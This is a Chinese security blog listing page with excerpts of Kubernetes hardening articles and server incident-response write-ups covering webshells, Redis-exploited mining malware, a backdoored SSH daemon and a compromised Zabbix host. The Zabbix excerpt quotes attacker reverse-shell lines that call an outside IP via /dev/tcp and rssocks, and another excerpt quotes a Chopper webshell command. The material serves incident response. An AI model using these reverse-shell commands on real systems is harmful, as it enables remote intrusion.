当前位置:8090社团 >
  • Kubernetes提供了许多可以极大地提高应用程序安全性的选项,配置它们要求您熟悉Kubernetes以及其部署的安全要求。本文具体介绍了Kubernetes服务的安全加固方案,帮助您部署安全的Kubernetes应用。 安全加固方案 确保镜像没有安全漏洞 在部署前,应该确保所有的操作系...
  • 目标 当我们刚接触Kubernetes进行测试集群的搭建时,往往会选择一篇已有的教程,照着教程完成集群搭建。我们很少去质疑教程作者每一步操作的合理性,只想快点把集群搭建起来,早点开始实际的上手体验。 与测试集群不同,对于生产级别的部署,我们会有更加严格的要求...
  • 03-26
    故障解决 超过148 人围观 0条评论
    java程序挂马
    0x01 背景 本周是在目前公司的最后一周,周五就离职了,在这里待了2年半时间,说短也不短,职业生涯可能也没多少个2年半。出门和同事去撸串的路上收到的告警,急忙赶回来处理,很简单的一次应急,没什么技术含量,因为时间点特殊才想着记录一下,毕竟是最...
  • 03-26
    故障解决 超过178 人围观 0条评论
    Linux服务器挖矿病毒
    攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。 排查过程 检查进程发现SSH后门 [root@testserver tmp]# ps aux | grep 2345 | grep -v grep root 13587 0.0 0.0 66624 1144 ? Ss Mar22 0:00 /tmp/su -oPort=2345 [root@testserver tmp]# lso...
  • 03-26
    故障解决 超过138 人围观 0条评论
    Linux服务器对外发包
    一哥们反应自己的测试机器总是关机,联系云主机客服得知服务器总是大量发包,导致技术关停该机器。 排查过程 Last查看登录记录 查找到一个可疑IP [root@i-9kp9tipm dpkgd]# grep "1.180.212.21" /var/log/secure* /var/log/secure-20170409:Apr 4 22:2...
  • 03-26
    故障解决 超过160 人围观 0条评论
    zabbix服务器被入侵解决
    0x01 背景 2017.3.27中午运维反应怀疑zabbix所在服务器被入侵。 0x02 排查过程 ps查看进程,发现端口反弹行为 Bash反弹:/dev/tcp/107.151.149.242/82 0>&1 Python反弹:rssocks -s 107.151.149.242:1080 查看进程启动时间发现为Feb 27,启动账...
  • 03-26
    故障解决 超过154 人围观 0条评论
    0x01 排查过程 11:10看到主机监控告警,告警内容为 cd "/usr/local/web/cdksw/general-tomcat-6.0.18/webapps/background/background/upload/";ver;echo [S];pwd;echo [E] 看内容就是菜刀马执行,看目录发现是upload可以猜测是文件上传的问题。受影响的是...
  • 03-26
    故障解决 超过1102 人围观 0条评论
    0x01 排查过程 异常进程发现: /usr/bin/.sshd [kworker95] 在开机启动中发现: /tmp下的异常文件 异常的网络连接 使用lsof的时候发现返回内容不正常,查看下lsof mtime为10:46,并且大小不正常,很明显命令被替换了。 看下/usr/bin/下 /use/sbin下 ...